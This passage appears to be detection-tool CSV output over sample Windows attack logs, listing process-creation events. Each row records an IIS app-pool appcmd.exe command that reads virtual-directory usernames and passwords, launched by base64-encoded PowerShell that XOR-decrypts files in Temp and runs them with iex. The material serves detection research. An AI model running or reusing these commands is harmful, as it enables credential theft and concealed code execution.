ZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.143 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.233 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.323 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.403 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.473 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.563 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 